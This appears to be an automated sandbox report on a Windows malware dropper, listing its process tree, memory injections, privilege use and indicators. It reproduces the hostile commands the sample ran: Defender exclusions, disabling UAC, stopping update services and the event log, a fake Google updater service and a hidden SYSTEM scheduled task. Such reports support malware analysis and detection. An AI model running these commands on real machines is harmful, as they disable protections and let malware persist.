Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	xiHRfnBKizFr8TNGB2AWFI2t.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

Processes:

powershell.exe86HUE2y4YsytNX1op0d40Qrp.exeJ3Bd05kGcdWhqmPKAo19DW1R.exexiHRfnBKizFr8TNGB2AWFI2t.exepowershell.exeupdater.exepowershell.exeexplorer.exe

pid	process
2212	powershell.exe
1060	86HUE2y4YsytNX1op0d40Qrp.exe
1060	86HUE2y4YsytNX1op0d40Qrp.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
1488	xiHRfnBKizFr8TNGB2AWFI2t.exe
1488	xiHRfnBKizFr8TNGB2AWFI2t.exe
2604	powershell.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
2300	J3Bd05kGcdWhqmPKAo19DW1R.exe
1756	updater.exe
1936	powershell.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
1756	updater.exe
2476	explorer.exe
2476	explorer.exe
2476	explorer.exe
2476	explorer.exe
2476	explorer.exe
2476	explorer.exe
2476	explorer.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exeAddInProcess32.exe86HUE2y4YsytNX1op0d40Qrp.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2204	AddInProcess32.exe
Token: SeManageVolumePrivilege	1060	86HUE2y4YsytNX1op0d40Qrp.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeShutdownPrivilege	2800	powercfg.exe
Token: SeShutdownPrivilege	2212	powercfg.exe
Token: SeShutdownPrivilege	2780	powercfg.exe
Token: SeShutdownPrivilege	2640	powercfg.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeShutdownPrivilege	484	powercfg.exe
Token: SeShutdownPrivilege	536	powercfg.exe
Token: SeShutdownPrivilege	2376	powercfg.exe
Token: SeShutdownPrivilege	672	powercfg.exe
Token: SeLockMemoryPrivilege	2476	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exeAddInProcess32.execmd.execmd.exeupdater.exellnS9RqKK778oo6e03psvyNr.exe

description	pid	process	target process
PID 2456 wrote to memory of 2212	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	powershell.exe
PID 2456 wrote to memory of 2212	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	powershell.exe
PID 2456 wrote to memory of 2212	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	powershell.exe
PID 2456 wrote to memory of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 2456 wrote to memory of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 2456 wrote to memory of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 2456 wrote to memory of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 2456 wrote to memory of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 2456 wrote to memory of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 2456 wrote to memory of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 2456 wrote to memory of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 2456 wrote to memory of 2204	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	AddInProcess32.exe
PID 2456 wrote to memory of 2712	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	WerFault.exe
PID 2456 wrote to memory of 2712	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	WerFault.exe
PID 2456 wrote to memory of 2712	2456	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe	WerFault.exe
PID 2204 wrote to memory of 1060	2204	AddInProcess32.exe	86HUE2y4YsytNX1op0d40Qrp.exe
PID 2204 wrote to memory of 1060	2204	AddInProcess32.exe	86HUE2y4YsytNX1op0d40Qrp.exe
PID 2204 wrote to memory of 1060	2204	AddInProcess32.exe	86HUE2y4YsytNX1op0d40Qrp.exe
PID 2204 wrote to memory of 1060	2204	AddInProcess32.exe	86HUE2y4YsytNX1op0d40Qrp.exe
PID 2204 wrote to memory of 1060	2204	AddInProcess32.exe	86HUE2y4YsytNX1op0d40Qrp.exe
PID 2204 wrote to memory of 1060	2204	AddInProcess32.exe	86HUE2y4YsytNX1op0d40Qrp.exe
PID 2204 wrote to memory of 1060	2204	AddInProcess32.exe	86HUE2y4YsytNX1op0d40Qrp.exe
PID 2204 wrote to memory of 2300	2204	AddInProcess32.exe	J3Bd05kGcdWhqmPKAo19DW1R.exe
PID 2204 wrote to memory of 2300	2204	AddInProcess32.exe	J3Bd05kGcdWhqmPKAo19DW1R.exe
PID 2204 wrote to memory of 2300	2204	AddInProcess32.exe	J3Bd05kGcdWhqmPKAo19DW1R.exe
PID 2204 wrote to memory of 2300	2204	AddInProcess32.exe	J3Bd05kGcdWhqmPKAo19DW1R.exe
PID 2204 wrote to memory of 1488	2204	AddInProcess32.exe	xiHRfnBKizFr8TNGB2AWFI2t.exe
PID 2204 wrote to memory of 1488	2204	AddInProcess32.exe	xiHRfnBKizFr8TNGB2AWFI2t.exe
PID 2204 wrote to memory of 1488	2204	AddInProcess32.exe	xiHRfnBKizFr8TNGB2AWFI2t.exe
PID 2204 wrote to memory of 1488	2204	AddInProcess32.exe	xiHRfnBKizFr8TNGB2AWFI2t.exe
PID 2160 wrote to memory of 2100	2160	cmd.exe	wusa.exe
PID 2160 wrote to memory of 2100	2160	cmd.exe	wusa.exe
PID 2160 wrote to memory of 2100	2160	cmd.exe	wusa.exe
PID 2816 wrote to memory of 2328	2816	cmd.exe	wusa.exe
PID 2816 wrote to memory of 2328	2816	cmd.exe	wusa.exe
PID 2816 wrote to memory of 2328	2816	cmd.exe	wusa.exe
PID 1756 wrote to memory of 920	1756	updater.exe	conhost.exe
PID 1756 wrote to memory of 920	1756	updater.exe	conhost.exe
PID 1756 wrote to memory of 920	1756	updater.exe	conhost.exe
PID 1756 wrote to memory of 920	1756	updater.exe	conhost.exe
PID 1756 wrote to memory of 920	1756	updater.exe	conhost.exe
PID 1756 wrote to memory of 920	1756	updater.exe	conhost.exe
PID 1756 wrote to memory of 920	1756	updater.exe	conhost.exe
PID 1756 wrote to memory of 920	1756	updater.exe	conhost.exe
PID 1756 wrote to memory of 920	1756	updater.exe	conhost.exe
PID 1756 wrote to memory of 2476	1756	updater.exe	explorer.exe
PID 1756 wrote to memory of 2476	1756	updater.exe	explorer.exe
PID 1756 wrote to memory of 2476	1756	updater.exe	explorer.exe
PID 1756 wrote to memory of 2476	1756	updater.exe	explorer.exe
PID 1756 wrote to memory of 2476	1756	updater.exe	explorer.exe
PID 2204 wrote to memory of 940	2204	AddInProcess32.exe	llnS9RqKK778oo6e03psvyNr.exe
PID 2204 wrote to memory of 940	2204	AddInProcess32.exe	llnS9RqKK778oo6e03psvyNr.exe
PID 2204 wrote to memory of 940	2204	AddInProcess32.exe	llnS9RqKK778oo6e03psvyNr.exe
PID 2204 wrote to memory of 940	2204	AddInProcess32.exe	llnS9RqKK778oo6e03psvyNr.exe
PID 2204 wrote to memory of 940	2204	AddInProcess32.exe	llnS9RqKK778oo6e03psvyNr.exe
PID 2204 wrote to memory of 940	2204	AddInProcess32.exe	llnS9RqKK778oo6e03psvyNr.exe
PID 2204 wrote to memory of 940	2204	AddInProcess32.exe	llnS9RqKK778oo6e03psvyNr.exe
PID 940 wrote to memory of 1000	940	llnS9RqKK778oo6e03psvyNr.exe	Install.exe
PID 940 wrote to memory of 1000	940	llnS9RqKK778oo6e03psvyNr.exe	Install.exe
PID 940 wrote to memory of 1000	940	llnS9RqKK778oo6e03psvyNr.exe	Install.exe
PID 940 wrote to memory of 1000	940	llnS9RqKK778oo6e03psvyNr.exe	Install.exe
PID 940 wrote to memory of 1000	940	llnS9RqKK778oo6e03psvyNr.exe	Install.exe
PID 940 wrote to memory of 1000	940	llnS9RqKK778oo6e03psvyNr.exe	Install.exe
PID 940 wrote to memory of 1000	940	llnS9RqKK778oo6e03psvyNr.exe	Install.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe

C:\Users\Admin\AppData\Local\Temp\79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe
"C:\Users\Admin\AppData\Local\Temp\79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\79bb1f7b467bbceed03d27d325a0c076943f57d696d96d0d1178a2b750a931a8.exe" -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204

C:\Users\Admin\Pictures\86HUE2y4YsytNX1op0d40Qrp.exe
"C:\Users\Admin\Pictures\86HUE2y4YsytNX1op0d40Qrp.exe" /s
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060

C:\Users\Admin\Pictures\360TS_Setup.exe
"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
4⤵
PID:892

C:\Program Files (x86)\1716254685_0\360TS_Setup.exe
"C:\Program Files (x86)\1716254685_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
5⤵
PID:2676

C:\Users\Admin\Pictures\J3Bd05kGcdWhqmPKAo19DW1R.exe
"C:\Users\Admin\Pictures\J3Bd05kGcdWhqmPKAo19DW1R.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2300

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
4⤵
- Suspicious use of WriteProcessMemory
PID:2160

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
5⤵
- Drops file in Windows directory
PID:2100

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
4⤵
- Launches sc.exe
PID:2424

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:2624

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
4⤵
- Launches sc.exe
PID:300

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
4⤵
- Launches sc.exe
PID:2708

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
4⤵
- Launches sc.exe
PID:2200

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2640

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
4⤵
- Launches sc.exe
PID:1736

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
4⤵
- Launches sc.exe
PID:3032

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:2588

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
4⤵
- Launches sc.exe
PID:1696

C:\Users\Admin\Pictures\xiHRfnBKizFr8TNGB2AWFI2t.exe
"C:\Users\Admin\Pictures\xiHRfnBKizFr8TNGB2AWFI2t.exe"
3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1488

C:\Users\Admin\Pictures\llnS9RqKK778oo6e03psvyNr.exe
"C:\Users\Admin\Pictures\llnS9RqKK778oo6e03psvyNr.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:940

C:\Users\Admin\AppData\Local\Temp\7zSB04C.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
5⤵
PID:1744

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
6⤵
PID:2364

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
7⤵
PID:2604

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:2296

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
6⤵
PID:1588

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
7⤵
PID:1820

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
8⤵
PID:2920

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
6⤵
PID:1400

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
7⤵
PID:2984

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:1560

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
6⤵
PID:2928

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
7⤵
PID:2988

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:868

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:2728

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
7⤵
PID:2336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
8⤵
- Command and Scripting Interpreter: PowerShell
PID:2608

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
9⤵
PID:2100

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:2836

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:1544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
PID:1260

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:820

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\IZtjzRX.exe\" it /LYXdidwfoE 385118 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:2128

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
5⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
6⤵
PID:2364

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
7⤵
PID:2920

C:\Users\Admin\Pictures\ORAQg8nq3DH6Jz6zepNGB2mH.exe
"C:\Users\Admin\Pictures\ORAQg8nq3DH6Jz6zepNGB2mH.exe"
3⤵
PID:1516

C:\Users\Admin\AppData\Local\Temp\7zSCC83.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
4⤵
PID:2688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
5⤵
PID:1088

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
6⤵
PID:1664

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
7⤵
PID:1572

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:2252

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
6⤵
PID:2804

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
7⤵
PID:1632

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
8⤵
PID:1316

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
6⤵
PID:2588

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
7⤵
PID:2008

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:2012

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
6⤵
PID:1720

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
7⤵
PID:344

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:1936

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:2840

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
7⤵
PID:2372

